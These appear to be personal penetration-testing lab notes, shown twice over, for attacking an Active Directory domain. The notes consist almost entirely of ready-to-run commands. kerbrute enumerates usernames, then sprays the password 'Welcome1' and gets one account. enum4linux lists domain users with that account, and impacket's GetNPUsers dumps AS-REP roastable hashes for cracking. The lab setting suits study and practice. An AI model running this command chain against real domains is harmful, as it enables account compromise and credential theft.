Lab Notes

Guess names of valid accounts from statistically likely usernames
- produce custom list using base lists, as format used by environment did not already have corresponding wordlist
- kerbrute_linux_amd64 userenum --dc 192.168.1.200 -d acme.local ./statistically-likely-usernames/john_smith.txt
Perform password spray across all discovered usernames with "Welcome1"
- kerbrute_linux_amd64 passwordspray -d acme.local --dc 192.168.1.200 valid_usernames.txt Welcome1
- password spray was successful for user chris_nelson
Get list of all domain users
- enum4linux -U -u chris_nelson -p Welcome1 192.168.1.200
Get list of ASREP Roastable users and their hashes for cracking
- python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -usersfile all_usernames.txt -request -format hashcat -outputfile ASREP_roastable_users_hashes.txt -dc-ip 192.168.1.200 'ACME/'

Last updated 1 year ago

Guess names of valid accounts from statistically likely usernames
- produce custom list using base lists, as format used by environment did not already have corresponding wordlist
- kerbrute_linux_amd64 userenum --dc 192.168.1.200 -d acme.local ./statistically-likely-usernames/john_smith.txt
Perform password spray across all discovered usernames with "Welcome1"
- kerbrute_linux_amd64 passwordspray -d acme.local --dc 192.168.1.200 valid_usernames.txt Welcome1
- password spray was successful for user chris_nelson
Get list of all domain users
- enum4linux -U -u chris_nelson -p Welcome1 192.168.1.200
Get list of ASREP Roastable users and their hashes for cracking
- python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -usersfile all_usernames.txt -request -format hashcat -outputfile ASREP_roastable_users_hashes.txt -dc-ip 192.168.1.200 'ACME/'

Last updated 1 year ago